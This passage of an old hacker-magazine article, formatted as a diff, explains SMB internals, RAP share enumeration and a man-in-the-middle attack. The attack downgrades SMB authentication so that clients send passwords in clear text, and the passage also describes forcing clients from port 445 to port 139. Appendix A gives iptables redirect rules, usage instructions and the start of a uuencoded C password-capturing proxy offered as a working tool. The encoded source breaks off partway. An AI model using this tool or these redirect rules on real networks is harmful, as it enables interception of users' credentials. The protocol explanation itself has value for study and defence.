+redirects this packet. He changes the encryption bit to have
+plain text password .
+
+
+
+                  negprot reply
+[client] <----------------------------- [attacker]        [server]
+               (encryption bit set
+           to have plain text password )
+
+The attacker sends the modified negprot reply with the encryption 
+bit changed to have the password in clear text. 
+
+
+
+
+            sesssetupX request
+[client] ------------------------> [attacker]        [server]
+         (password in clear text)
+
+The client sends the password in clear text, the attacker recovers 
+it.
+
+
+                                     sesssetupX request
+[client]                [attacker] --------------------->  [server]
+                                    (password encrypted)
+
+The attacker sends a sesssetupx request to the server with the 
+encrypted password.
+
+
+
+                                    sesssetupX reply
+[client] <------------- [attacker] <----------------  [server]   
+
+The servers sends the sesssetupx reply. The attacker redirects it.
+
+
+
+[client] <------------> [attacker] <--------------> [server]
+
+The attacker continues to redirect traffic between the two machines 
+until the end of the SMB session.
+
+
+The implementation of the man in the middle attack is given in the
+Appendix A (the NAT and iptables rules are given also).
+
+Take a look at the source code, you will learn a lot of
+details !.
+
+
+----[ 6.7 - Notes about windows 2k/XP SMB operating over TCP/IP 
+
+As I wrote before, on Windows 2k/XP, SMB can run directly over TCP.
+The SMB server is listening incoming connexions on port 445.
+But it's not so "directly". In fact instead of having a NETBIOS header
+which is 4 bytes long, we have a other header which is 4 bytes long too.
+
+Description :
+
+        |---------------|
+        |      TCP      |
+        |---------------|
+        |SPECIAL HEADER |
+        |---------------|
+        |  SMB BASE HDR |
+        |---------------|
+
+This special header is defined like this :
+
+                UCHAR Zero;   	// Set to zero
+                UCHAR Length[3];// Count of data bytes (the 4 bytes of
+                                   the header are not included)
+
+This special header is not very different than the NETBIOS header. You 
+will understand why.
+
+This is the NETBIOS header :
+
+                UCHAR Type;   	// Type of the packet
+                UCHAR Flags;  	// Flags
+                USHORT Length;	// Count of data bytes (netbios header
+                                                        not included)
+							
+When SMB is running over TCP, the NETBIOS request session should 
+be not used.
+
+In fact, the NETBIOS names of the client and of the server should not 
+be sent. So the value of the "Type" field in the NETBIOS is always 
+equal to zero (the "Type" field is different from zero when the client
+sends his encoded NETBIOS name - Type = 0x81 - and when it receives 
+the reply - Type = 0x82 -). Remember, during the SMB session the
+Type field is equal to zero ( it's the "Type" code for the NETBIOS 
+session message).
+
+For the first byte nothing is different.
+
+For the last three bytes now :
+
+The "Flags" field of the NETBIOS header is always set to zero.
+The length of the packet only takes the two last bytes of the special
+header.
+
+The three last bytes are the same.
+
+To conclude there is no difference between the NETBIOS and the special
+header when NETBIOS is not used.
+
+Downgrade attack :
+
+If the client (running on windows XP or 2k) has NBT enabled, it always
+try to connect to the port 139 and 445 simultaneously. If the client 
+has a response from the port 445, the client will send a RST packet 
+to the port 139. If the client has no response from the port 445, it 
+will try to connect on port 139. If it has no response from the both, 
+the session will fail.
+If the client has NBT disabled, the client will try on the port 445 
+only.
+
+To perform a Downgrade attack i.e force the client to not use the port 
+445 and to use the port 139, you have to make believe to the client 
+that the 445 is closed. With the transparent proxy attack it's very 
+easy, with iptables you have just to redirect the incoming traffic
+on the attacker's machine on port 445 to a closed port. With this
+the client will use the port 139 (the iptables rules for this is
+given in appendix A).
+This will work if NBT is enabled.
+
+If the client has NBT disabled, the transparent proxy will operate the 
+SMB traffic on port 445. You've got an option on the program for this.
+
+Ok, we have finished with the attack for recovering passwords.
+We will study now an another important part of SMB.
+
+                  
+--[ 7 - Transaction subprotocol and RAP commands
+
+
+I will explain in this chapter a panel of special (and obscur ) 
+SMB commands : the RAP commands.
+These commands use the transaction subprotocol. 
+I will also describe this subprotocol.
+
+----[ 7.1 - The transaction subprotocol
+
+When a large amount of data is sent during a SMB session or if there is
+a specific operation requested,the SMB protocol includes a transaction 
+subprotocol.  
+
+The transaction subprotocol is mainly used for SMB Remote Procedure 
+Calls : The RAP commands (RAP for Remote Administration Protocol). 
+But I will explain it later. 
+
+The transaction subprotocol is not a derived protocol of SMB. The 
+transaction subprotocol is just an other command for SMB. So the
+transaction subprotocol is layered on SMB base header and the command 
+code for the transaction subprotocol is 0x25.
+
+Like the other commands there is a request and a reply.
+
+This is the Transaction request header :
+				  
+ UCHAR WordCount;                 Count of parameter words;   value =
+                                  (14 + value of the "SetupCount" field)
+ USHORT TotalParameterCount;      Total parameter bytes being sent
+ USHORT TotalDataCount;           Total data bytes being sent
+ USHORT MaxParameterCount;        Max parameter bytes to return
+ USHORT MaxDataCount;             Max data bytes to return
+ UCHAR MaxSetupCount;             Max setup words to return
+ UCHAR Reserved;
+ USHORT Flags;                    Additional information:
+                                  bit 0 - also disconnect TID in TID
+                                  bit 1 - one-way transaction (no
+                                  response)
+ ULONG Timeout;
+ USHORT Reserved2;
+ USHORT ParameterCount;           Parameter bytes sent this buffer
+ USHORT ParameterOffset;          Offset (from header start) to
+                                  Parameters
+ USHORT DataCount;                Data bytes sent this buffer
+ USHORT DataOffset;               Offset (from header start) to data
+ UCHAR SetupCount;                Count of setup words
+ UCHAR Reserved3;                 Reserved (pad above to word)
+ USHORT Setup[SetupCount];        Setup words (# = SetupWordCount)
+ USHORT ByteCount;                Count of data bytes
+ STRING Name[];                   Name of transaction (NULL if
+                                  SMB_COM_TRANSACTION2)
+ UCHAR Pad[];                     Pad to SHORT or LONG
+ UCHAR Parameters[                Parameter bytes (# = ParameterCount)
+ ParameterCount];
+ UCHAR Pad1[];                    Pad to SHORT or LONG
+ UCHAR Data[ DataCount ];         Data bytes (# = DataCount)
+
+In a majority of case, a RAP command sent with  Transaction subprotocol 
+may need several Transaction packets for sending the parameters 
+and data bytes. The parameters bytes are usually sent first, followed 
+by the data bytes. If several transaction packets must be involved, 
+the server sends this small packet for acknoledgement between each 
+transaction packets :
+
+Interim Reply packets :
+
+ UCHAR WordCount;                 Count of parameter words = 0
+ USHORT ByteCount;                Count of data bytes = 0
+
+For the transaction request header, the "TotalParameterCount" field 
+represents a count of paramaters bytes to be sent and it's the same 
+for the "TotalDataCount" field (count of data bytes to be sent). 
+ 
+The offset from the start of the SMB base header to the parameters 
+bytes and the data bytes are given with the "ParameterOffset" and 
+"DataOffset" fields. 
+
+The parameters bytes are in the "Parameters" field.
+The data bytes are in the "Data" field.
+
+You must understand that these "Parameters" and "Data" fields are used 
+for the RAP command. "Parameters" contains the parameters bytes for 
+the RAP command and "Data", the data bytes.
+
+The fields for "DataCount" and "ParameterCount" represent respectivily 
+the count of data bytes and the count of parameters bytes present in 
+the considereted transaction packet. If these fields are equal to 
+the "TotalParameterCount" and the "TotalDataCount", it involved that 
+all parameter and data bytes fit in a single packet. If they are not, 
+it involved that the server (for request) or the client (for reply) 
+must wait for another packets. When all packets are received, the 
+parameter and data bytes are marshalled for analysis.
+
+Take a look at the field "WordCount", it contains the value  : 
+14 + "SetupCount" field, in majority of case SetupCount is equal to 0.
+
+The Transaction reply header: 
+
+There is not a big difference between the reply and the request
+
+ UCHAR WordCount;                 Count of data bytes; value = 10 +
+                                  "Setupcount" field.
+ USHORT TotalParameterCount;      Total parameter bytes being sent
+ USHORT TotalDataCount;           Total data bytes being sent
+ USHORT Reserved;
+ USHORT ParameterCount;           Parameter bytes sent this buffer
+ USHORT ParameterOffset;          Offset (from header start) to
+                                  Parameters
+ USHORT ParameterDisplacement;    Displacement of these Parameter
+                                  bytes
+ USHORT DataCount;                Data bytes sent this buffer
+ USHORT DataOffset;               Offset (from header start) to data
+ USHORT DataDisplacement;         Displacement of these data bytes
+ UCHAR SetupCount;                Count of setup words
+ UCHAR Reserved2;                 Reserved (pad above to word)
+ USHORT Setup[SetupWordCount];    Setup words (# = SetupWordCount)
+ USHORT ByteCount;                Count of data bytes
+ UCHAR Pad[];                     Pad to SHORT or LONG
+ UCHAR                            Parameter bytes (# = ParameterCount)
+ Parameters[ParameterCount];
+ UCHAR Pad1[];                    Pad to SHORT or LONG
+ UCHAR Data[DataCount];           Data bytes (# = DataCount)
+
+The client must use the "ParameterOffset" and "DataOffset" to know the 
+offset (from the beginning of the SMB base header) of data and 
+parameters bytes.
+
+
+----[ 7.2 - RAP commands     
+
+RAP (Remote Administration Protocol) is the SMB implementation of 
+RPC.   
+
+ 
+RAP request : 
+
+       |---------------------------|
+       |TCP HDR                    |
+       |---------------------------|
+       |NETBIOS HDR                |
+       |---------------------------|
+       |SMB BASE HDR               |
+       |---------------------------|
+       |SMB TRANSACTION REQUEST HDR|
+       |---------------------------|
+       |RAP REQUEST PARAMETERS     |
+       |---------------------------| 
+       |RAP REQUEST DATAS          | 
+       |---------------------------|
+       
+RAP Reply :
+
+       |---------------------------|
+       |TCP HDR                    |
+       |---------------------------|
+       |NETBIOS HDR                |
+       |---------------------------|
+       |SMB BASE HDR               |
+       |---------------------------|
+       |SMB TRANSACTION REPLY HDR  |
+       |---------------------------|
+       |RAP REPLY PARAMETERS       |
+       |---------------------------|
+       |RAP REPLY DATAS            |
+       |---------------------------| 	
+
+        
+ When you use a RAP command you always find the string "\PIPE\LANMAN" 
+ in the "Name" field in the transaction (request and reply) header.
+ 
+ These are several examples of RAP commands : 
+ 
+ -NETSHAREENUM : Retrieve information about each shared ressource 
+                 on a server
+
+ -NETSERVERENUM2 : List all the computer of specified types in a 
+                   specified domain
+
+ -NETSERVERGETINFO : Get information about a specified server
+
+ -NETSHAREGETINFO : Retrieve information about a paticular shared 
+                    ressource
+
+ -NETWKSTAUSERLOGON : Execute on a SMB server for logging an user.
+ 
+ -NETWSTAUSERLOGOFF : The same but for deloging.
+
+ -NETUSERGETINFO : Obtain information about a particular user.
+
+ -NETWKSTAGETINFO : Obtain information about a particular station.
+
+ -SAMOEMCHANGEPASSWORD : For changing the password of a specified user on 
+                         a remote SMB server.
+
+I'm not going to describe all of these commands, I will just take one for 
+example (to have a listing of shared resource avaible on a server).
+
+If you want to know more about RAP commands read [2].
+
+
+--[ 8 - Using RAP commands to list available shares on a server
+
+ 
+ This part is a complement of the previous chapter. I will explain 
+how the RAP commands work by giving an example.
+
+
+The program given in Appendix B is the implementation of what is 
+explained in this chapter. It does the same things that the commands 
+"net view \\ServerIP" (for DOS) or "smbclient -L ServerIP -N " 
+(on Linux).  But this program allows you to specified the NETBIOS 
+name, it is a bit anonymous. If you read this source you will 
+learn a lot a things about SMB network programming.
+ 
+How I can retrieve SMB everyone shares on a network :
+
+The process is easy to understand. The client must be authentificated 
+on the server . The client identifies itself with the process developed 
+in chapter 3 (with no password). When the server has checked the 
+identity of the client, the client sends a Tconx request (after the 
+Sessetupx reply).
+
+Tconx means "Tree CONnect and X).
+
+The TconX request packet is used to acess to a shared ressource.
+
+----[ 8.1 - Tconx Packets 
+ 
+
+ Request header
+  
+ The TconX packets are layered on the SMB Base Header ("Command" = 0x75).
+
+ 
+UCHAR WordCount;                   Count of parameter words = 4
+UCHAR AndXCommand;                 Secondary (X) command; 0xFF = none
+UCHAR AndXReserved;                Reserved (must be 0)
+USHORT AndXOffset;                 Offset to next command WordCount
+USHORT Flags;                      Additional information
+                                   
+USHORT PasswordLength;             Length of Password[]
+USHORT ByteCount;                  Count of data bytes;    min = 3
+UCHAR Password[];                  Password
+STRING Path[];                     Server name and share name
+STRING Service[];                  Service name
+
+
+
+The password was sent during the session establishement. 
+The Password length is set to 1 and and the Password 
+string contains null value (0x00).
+
+The string "Path" contains the name of the ressource that client wishes 
+connect. It use the unicode style syntax . For example I want to connect 
+ on a share called "myshare" on a server called "myserver" . The 
+Path string will containt "\\myserver\myshare". 
+
+The "Service" string contains the type of ressource requested :
+       	
+	string		Type of ressource
+	
+	"A:" 		disk share.
+	"LPT1:" 	printer.
+	"IPC"  	        named pipe.
+	"COMM" 	        communications device.
+	"?????" 	any type of device.
+ 
+For scaning any type of device you must use the "?????" string in the 
+"Service" field.
+
+After sending your Tconx request on the server. The server replies with 
+a TconX reply. You must recover the "Tid" field (in the SMB Base header) 
+which is the Transaction request with the RAP command. 
+You must specified to the server that you want to know which ressources 
+are available. For this, you must use the RAP command : NETSHAREENUM.
+
+
+----[ 8.2 - Explanation of the RAP command "NetShareEnum" :
+
+
+The RAP command that we will study is NetShareEnum.
+
+The RAP Command "NetshareEnum" request  :
+
+The field "Parameters" of the transaction request header received :
+
+  The 16 bit code of function NetShareEnum : 0;
+  
+  The parameter desriptor string : "WrLeh" 
+  
+  Data descriptor string for returned data : "B13BWZ"
+  
+  A 16 bit integer with a value of x01;
+  
+  A 16 bit integer that contains the size of the receive buffer.
+
+It will be too long to explain how parameter and data descriptor strings 
+works. These strings are used to know the size and the format of 
+parameters and datas. One parameter and one data descriptor string 
+is defined for each RAP command.
+
+if you want to know more about this strings, read [2].
+
+No datas are needed for this request so the "DataCount" and 
+"TotalDataCount" fields are equal to zero. 
+
+
+  |--------------------------------------------|
+  |             NETBIOS HDR                    |---------> 4 bytes
+  |--------------------------------------------| 
+  |             SMB BASE HDR   	               |---------> 32 Bytes
+  |--------------------------------------------|	
+  |        SMB TRANSACTION REQUEST HDR         |
+  |--------------------------------------------|
+
+The Transaction request "Parameters" field receives the parameters 
+for the RAP request : 
+
+  |--------------|
+  |      0x0000  | ----------------------------------------> A
+  |--------------|--------------|--------------|
+  |   W       r  |  L        e  |  h       0x00|-----------> B
+  |--------------|--------------|--------------|-------|
+  |   B       1  |  3        B  |  W         Z |  0x00 |---> C
+  |--------------|--------------|--------------|-------|
+  |     0x0001   |     0xffff   |--------------------------> D
+  |--------------|--------------|
+  
+  
+  A : The NetshareEmun function code : 0x00                            
+  B : The parameter descriptor string
+  C : The data descriptor string
+  D : 0x01 (defined value) and 0xffff (Max size of the received buffer) 
+  
+And the server replies :
+
+the "Parameters" field of the transaction reply header receives :
+
+ A 16 bit integer word that contains the return status code :
+
+ Succes 0
+ Access Denied 5
+ Network Acess Denied 65
+ More data 234
+ Server not started 2114
+ Transaction configuration bad 2141
+
+ A 16 bit "converted word", uses to calculate an offset to remark 
+strings.
+ 
+ A 16 bit containts the number of entries returned = number of 
+ SHARE_INFO structure (see below ).
+ 
+ A 16 bit representing the number of available entries.
+ 
+ 
+ The field "Data" of the transaction reply header contains the several
+SHARE_INFO structures.
+ 
+ The SHARE_INFO structure contains the information about each shared
+ressource available and it is defined like this :
+ 
+  struct SHARE_INFO {
+    char shi1_netname[13]; /*Name of the ressource*/
+    
+    char shi1_pad; /*Pad to a word*/
+                     
+		     
+    unsigned short shi1_type; 
+
+       /*Code specifies the type of the shared resssource :
+          0 Disk Directory tree
+          1 Printer queue 
+          2 Communications device 
+          3 IPC*/
+
+
+    char *shi1_remark; /*Remark on the specified 
+                         ressource*/
+
+		      }
+
+ shi1_remark is a 32 bits pointer to a string. This string contains a
+ remark about a shared ressource. You must substract the 16 lower 
+ bits of "shi1_remark" to the "converter word" to know the offset 
+ between this string and the beginning of the RAP reply parameters 
+ header.
+ 
+ In fact with a ascii schema :
+ 
+  |--------------------------------------------|
+  |             NETBIOS HDR                    |------------> 4 bytes
+  |--------------------------------------------|
+  |             SMB BASE HDR   	               |------------> 32 Bytes
+  |--------------------------------------------|	
+  |             SMB TRANS REPLY HDR            |
+  |--------------------------------------------|
+ 
+Description of the "Parameters" section of the Transaction reply packet 
+(corresponding to the parameters of the NetShareEnum reply) :
+ 
+  |--------------------------------------------|
+  |           status code                      |-------------> 2 bytes
+  |--------------------------------------------|
+  |           converted word                   |-------------> 2 bytes
+  |--------------------------------------------|
+  |           number of entries returned       |-------------> 2 bytes
+  |--------------------------------------------|
+  |           number of entries available      |-------------> 2 bytes
+  |--------------------------------------------|
+  
+Data section of the Transaction reply (corresponding to the 
+several SHARE_INFO structures if there is more than one ressource
+available) :  
+  
+  |--------------------------------------------|
+  |         shi1_netname                       |-----------> 13 bytes
+  |--------------------------------------------|
+  |         shi1_pad to pad to word            |-----------> 1 byte  
+  |--------------------------------------------|
+  | type of service                            |-----------> 2 bytes
+  |--------------------------------------------|
+  | pointer to remark string                   |-----------> 4 bytes
+  |--------------------------------------------|
+                .
+          Another SHARE_INFO structures	
+	        .
+  |--------------------------------------------|
+  |               remark string 1              |
+  |--------------------------------------------|
+  |          another remarks strings           |
+  |--------------------------------------------|
+
+
+--[ 9 - Conclusion :
+
+ I hope you have learned a lot of things in this article.
+ If you have any comments, questions, send it at :
+ 
+                   <ledin@encephalon-zero.com>
+
+--[ 10 - References
+
+[1] "A common Internet File System (CIFS/1.0) Protocol
+    Preliminary Draft", Paul J.Leach and Dilip C. Naik
+    http://www.snia.org/tech_activities/CIFS/CIFS-TR-1p00_FINAL.pdf
+
+[2] "CIFS Remote Administration Protocol Preliminary Draft"
+    Paul J.Leach and Dilip C. Naik
+    http://us6.samba.org/samba/ftp/specs/cifsrap2.txt
+
+[3] RFC 1001
+    http://www.faqs.org/rfcs/rfc1001.html
+
+[4] RFC 1002
+    http://www.faqs.org/rfcs/rfc1002.html
+
+--[ 11 - Thanks
+
+Just a Merry Christmas to TearDrop, Frealek and "el Tonio".
+
+A big thank to TearDrop for all. Without him, nothing could
+be possible !
+
+Take a look at <gps.sourceforge.net>, you will find a very good 
+(and free) scanner !.
+
+Thanks to Mr D. (my network administrator !), for all the advices
+and the several Linux distribs.
+
+Thanks to the Chemical brothers for the inspirational music.
+
+Thanks to the phrack staff, for all their remarks and particulary 
+about the transparent proxy attack.
+
+To you for reading this article ;).
+
+
+
+--[  Appendix A
+
+This program allows you to have password in clear directly from
+the network when they should be encrypted. It works with libnet 
+(v 1.1 !) and libpcap.
+This is the implementation of the Transparent proxy attack of the
+chapter 6.6.
+
+libnet : www.packetfactory.net
+
+libpcap : www.tcpdump.org
+
+You must be root to compile and to execute this program !
+
+If you want to compile it, you could use : 
+       "gcc SMBproxy.c -o SMBproxy -lnet -lpcap"
+
+If you want to use it :
+       "SMBproxy -i interface  
+                  -c Client's IP address 
+		  -s Server's IP address 
+		  -f your fake IP (what you want : 6.6.6.6 for example)"
+                  -l listening port (1139 by default)
+
+Be careful the program will ask you about Windows 2k/XP specifictions
+support. But you must answer "y" when NBT is disabled not when it's 
+enabled on Windows 2k/XP !
+
+You give the IP adress of a client and of the server, this program 
+waits a connection of the client to a SMBserver, launches the attack, 
+recovers the password and redirects the traffic.
+
+The fake IP parameter corresponds to your fake IP, give what you want !
+The attacker's machine should have no active connections with the server 
+or with the client (like FTP or telnet ...).
+The default listening port is 1139
+
+This program gives the password and the user name (if necessary). It 
+also gives the security level (share or user). If the connection has 
+succeeded, it gives the name of the share and a message like "password 
+valid". If it has failed, it gives nothing (just the password and the
+user name).
+
+This program should be compiled on Linux for some technical reasons,
+like the network byte ordering. You shouldn't use it on the loopback
+interface.
+
+Support Windows 2k/XP specifications.
+
+This is the iptables/NAT command to execute on the attacker's machine
+
+To redirect incoming traffic to port 139 on port 1139
+
+#iptables -t nat -A PREROUTING -i eth0 -p tcp -s 192.168.1.3 \
+--dport 139 -j REDIRECT --to-port 1139
+
+192.168.1.3 is the IP address of the client. 
+
+
+To redirect the whole traffic
+
+#iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
+
+To redirect incoming traffic to port 445 on port 1139
+
+(for Windows 2k/XP client with NBT disabled)
+
+#iptables -t nat -A PREROUTING -i eth0 -p tcp -s 192.168.1.3 \
+--dport 445 -j REDIRECT --to-port 1139
+
+192.168.1.3 is the IP address of the client. 
+
+
+if you want to perform the downgrade attack of the chapter 6.8 remplace
+the port 1139 by a closed port.
+
+Be careful, for the traffic redirection, this line must be present in the
+/etc/sysconfig/network :
+
+FORWARD_IPV4=true
+
+This program doesn't support UNICODE strings.
+
+Successfully tested with samba server 2.0 .
+
+begin 600 smb_MiM_proxy.c
+M+RHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*@T*("`@("`@("`@("`@("`@("`@
+M("`@(%--0B!-04X@24X@5$A%($U)1$1,12!!5%1!0TL-"B`@("`@("`@("`@
+M("`@("`@("`@("`@("`@("!#;V1E9"!B>2!L961I;@T*("`@("`@("`@("`@
+M("`@("`@("`@("!L961I;D!E;F-E<&AA;&]N+7IE<F\N8V]M#0H@("`@("`@
+M("`@("`@("`@("`@("`@1F]R(&5D=6-A=&EO;F%L('!U<G!O<V4@;VYL>2`A
+M#0HJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHO#0H-"B-I;F-L=61E(#QS=&1I
+M;RYH/@T*(VEN8VQU9&4@/'-T<FEN9RYH/@T*(VEN8VQU9&4@/'-T9&QI8BYH
+M/@T*(VEN8VQU9&4@/'5N:7-T9"YH/@T*(VEN8VQU9&4@/&5R<FYO+F@^#0HC
+M:6YC;'5D92`\<VEG;F%L+F@^#0HC:6YC;'5D92`\<WES+VEO8W1L+F@^#0HC
+M:6YC;'5D92`\<WES+W1I;64N:#X-"B-I;F-L=61E(#QS>7,O=V%I="YH/@T*
+M(VEN8VQU9&4@/'-Y<R]S=&%T+F@^#0H-"B-I;F-L=61E(#QN970O:68N:#X-
+M"B-I;F-L=61E(#QS>7,O<V]C:V5T+F@^#0HC:6YC;'5D92`\87)P82]I;F5T
+M+F@^#0H-"B-I;F-L=61E(#QN971I;F5T+VEP+F@^#0HC:6YC;'5D92`\;F5T
+M:6YE="]I;BYH/@T*(VEN8VQU9&4@/&YE=&EN970O=&-P+F@^#0HC:6YC;'5D
+M92`\;F5T:6YE="]U9'`N:#X-"B-I;F-L=61E(#QN971I;F5T+VEF7V5T:&5R
+M+F@^#0H-"B-I;F-L=61E(#QL:6)N970N:#X-"B-I;F-L=61E(#QP8V%P+F@^
+M#0H-"@T*#0HC9&5F:6YE(%--0E]03U)4"3$S.0T*#0HC9&5F:6YE"5--0E]0
+M3U)47UA07S)+"30T-0T*#0HC9&5F:6YE"75?:6YT.%]T"75N<VEG;F5D(&-H
+M87(-"@T*(V1E9FEN90EU7VEN=#$V7W0)=6YS:6=N960@<VAO<G0-"@T*(V1E
+M9FEN90EU7VEN=#,R7W0)=6YS:6=N960@:6YT(`T*#0HC9&5F:6YE"75C:&%R
+M"75N<VEG;F5D(&-H87(@#0H-"B-D969I;F4)=5]C:&%R"75N<VEG;F5D(&-H
+M87(-"@T*(V1E9FEN90E)4%]-05A?4TE:10DV-34S-0T*#0HC9&5F:6YE"45.
+M0U]+15E?3$5.1U1("3@-"@T*(V1E9FEN90E%3D-?4$%34U=/4D1?3$5.1U1(
+M"3(T#0H-"B`-"B\J*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BH-"B`@("`@("`@
+M("`@("`@("`@("`@("`@("`@("`@("!35%)50U154D53("`@("`@("`@(`T*
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ+R`@("`@("`@("`@("`@("`@("`@
+M("`@("`@#0IT>7!E9&5F('-T<G5C=`T*>PT*('5?:6YT.%]T(%1Y<&4["0DO
+M*G1Y<&4J+PD-"B!U7VEN=#A?="!&;&%G<SL)+RIF;&%G<RHO#0H@=5]I;G0Q
+M-E]T($QE;F=T:#L)+RIL96YG=&@@;V8@=&AE($Y"5"!S97-S:6]N('!A8VME
+M="HO#0I]($YB=%-E<W-I;VY(9'([#0H-"@T*='EP961E9B!S=')U8W0-"GL-
+M"B!U7VEN=#A?="!0<F]T;V-O;%LT73L)+RI#;VYT86EN<R`P>$9&+"=334(G
+M*B\-"B!U7VEN=#A?="!#;VUM86YD.PDO*D-O;6UA;F0@0V]D92HO#0H@=6YI
+M;VX@#0H@>PT*("!S=')U8W0-"B`@>PT*("`@=5]I;G0X7W0@17)R;W)#;&%S
+M<SL)+RI%<G)O<B!#;&%S<RHO#0H@("!U7VEN=#A?="!297-E<G9E9#L)+RI2
+M97-E<G9E9"!F;W(@9G5T=7)E('5S92HO(`T*("`@=5]I;G0X7W0@17)R;W);
+M,ET["2\J17)R;W(@0V]D92HO#0H@('T@1&]S17)R;W([#0H@('5?:6YT.%]T
+M(%-T871U<ULT73L)+RHS,BUB:71S(&5R<F]R(&-O9&4J+PT*('T@4W1A='5S
+M(#L-"B!U7VEN=#A?="!&;&%G<SL)+RI&;&%G<RHO#0H@=5]I;G0X7W0@1FQA
+M9W,R6S)=.PDO*DUO<F4@1FQA9W,J+PT*('5N:6]N#0H@>PT*("!U7VEN=#A?
+M="!0861;,3)=.PT*("!S=')U8W0-"B`@>PT*("`@=5]I;G0X7W0@4&ED2&EG
+M:%LR73L)+RI(:6=H(%!A<G0@;V8@=&AE(%!I9"HO#0H@("!U7VEN=#A?="!5
+M;G5S961;-%T["2\J3F]T(%5S960J+PT*("`@=5]I;G0X7W0@56YU<V5D,ELT
+M73L)+RI.;W0@57-E9"HO#0H@('T@17AT<F$[#0H@?2!0861%>'1R83L-"B!U
+M7VEN=#A?="!4:61;,ET["2\J5')E92!)9&5N=&EF:65R*B\-"B!U7VEN=#A?
+M="!0:61;,ET["2\J0V%L;&5R)W,@<')O8V5S<R!)1"HO#0H@=5]I;G0X7W0@
+M56ED6S)=.PDO*E5N875T:&5N=&EC871E9"!U<V5R($E$*B\-"B!U7VEN=#A?
+M="!-:61;,ET["2\J375L=&EP;&5X($ED*B\-"GT@4VUB0F%S94AD<B`[#0H-
+M"G1Y<&5D968@<W1R=6-T(`T*>PT*('5?:6YT.%]T(%=O<F1#;W5N=#L)"2\J
+M0V]U;G0@;V8@<&%R86UE=&5R('=O<F1S(#TQ-RHO#0H@=5]I;G0X7W0@1&EA
+M;&5C=$EN9&5X6S)=.PDO*DEN9&5X(&]F('-E;&5C=&5D(&1I86QE8W0J+PT*
+M('5?:6YT.%]T(%-E8W5R:71Y36]D93L)"2\J4V5C=7)I='D@36]D92`Z*B\-
+M"@D)"0DO*F)I="`P(#H@,#US:&%R92P@,3UU<V5R*B\-"@D)"0DO*F)I="`Q
+M(#H@,3UE;F-R>7!T('!A<W-W;W)D<RHO#0H@=5]I;G0X7W0@36%X37!X0V]U
+M;G1;,ET["2\J36%X(%!E;F1I;F<@;75L=&EP;&5X960@<F5Q=65S="HO#0H@
+M=5]I;G0X7W0@36%X3G5M8F5R<U9C<ULR73L)+RI-87@@5D-S(&)E='=E965N
+M(&-L:65N="!A;F0@<V5R=F5R*B\-"B!U7VEN=#A?="!-87A"=69F97)3:7IE
+M6S1=.PDO*DUA>"!T<F%N<VUI="!B=69F97(@<VEZ92HO#0H@=5]I;G0X7W0@
+M36%X4F%W4VEZ95LT73L)+RI-87@@<F%W(&)U9F9E<B!S:7IE*B\-"B!U7VEN
+M=#A?="!397-S:6]N2V5Y6S1=.PDO*E5N:7%U92!T;VME;B!I9&5N=&EF>6EN
+M9R!T:&ES('-E<W-I;VXJ+PT*('5?:6YT.%]T($-A<&%B:6QI=&EE<ULT73L)
+M+RI397)V97(@0V%P86)I;&ET:65S*B\-"B!U7VEN=#A?="!3>7-T96U4:6UE
+M3&]W6S1=.PDO*E-Y<W1E;2`H551#*2!T:6UE(&]F('1H92!S97)V97(@*B\-
+M"B!U7VEN=#A?="!3>7-T96U4:6UE2&EG:%LT73L)+RI3>7-T96T@*%540RD@
+M=&EM92!O9B!T:&4@<V5R=F5R("HO#0H@=5]I;G0X7W0@4V5R=F5R5&EM95IO
+M;F5;,ET["2\J5&EM92!Z;VYE(&]F('-E<G9E<B`H;6EN(&9R;VT@551#*2HO
+M#0H@=5]I;G0X7W0@16YC<GEP=&EO;DME>4QE;F=T:#L)+RI,96YG=&@@;V8@
+M96YC<GEP=&EO;B!+97DJ+PT*('5?:6YT.%]T($)Y=&5#;W5N=%LR73L)"2\J
+M0V]U;G0@;V8@9&%T82!B>71E<RHO#0I](%-M8DYE9U!R;W1297!L>4AD<CL@
+M#0H-"G1Y<&5D968@<W1R=6-T#0I[#0H@=5]I;G0X7W0@5V]R9$-O=6YT.PDO
+M*D-O=6YT(&]F('!A<F%M971E<B!W;W)D<STQ,R`H<F5Q=65S="DJ+PT*('5?
+M:6YT.%]T($%N9%A#;VUM86YD.PDO*G-E8V]N9&%R>2`H6"D@8V]M;6%N9"PP
+M>$9&(#T@;F]N92HO#0H@=5]I;G0X7W0@06YD6%)E<V5R=F5D.PDO*G)E<V5R
+M=F5D("AM=7-T(&)E('IE<F\I*B\-"B!U7VEN=#A?="!!;F183V9F<V5T6S)=
+M.PDO*F]F9G-E="!T;R!N97AT(&-O;6UA;F0@5V]R9&-O=6YT*B\-"B!U7VEN
+M=#A?="!-87A"=69F97)3:7IE6S)=.PDO*D-L:65N="=S(&UA>&EM=6X@8G5F
+M9F5R('-I>F4J+PT*('5?:6YT.%]T($UA>$UP>$-O=6YT6S)=.PDO*F%C='5A
+M;"!M87AI;75N(&UU;'1I<&QE>&5D(')E<75E<W0J+PT*('5?:6YT.%]T(%9C
+M3G5M8F5R6S)=.PDO*C`]9FER<W0@*&]N;'DI+"!N;VYZ97)O+6%D9&ET:6]N
+M86P@5D,@;G5M8F5R*B\-"B!U7VEN=#A?="!397-S:6]N2V5Y6S1=.PDO*G-E
+M<W-I;VX@:V5Y("HO#0H@=5]I;G0X7W0@0V%S94EN<V5N<VET:79E4&%S<W=O
+M<F1,96YG=&A;,ET[("\J<VEZ92!O9B!P87-S=V]R9"`H04Y322DJ+PT*('5?
+M:6YT.%]T($-A<V5396YS:71I=F5087-S=V]R9$QE;F=T:%LR73L@+RIS:7IE
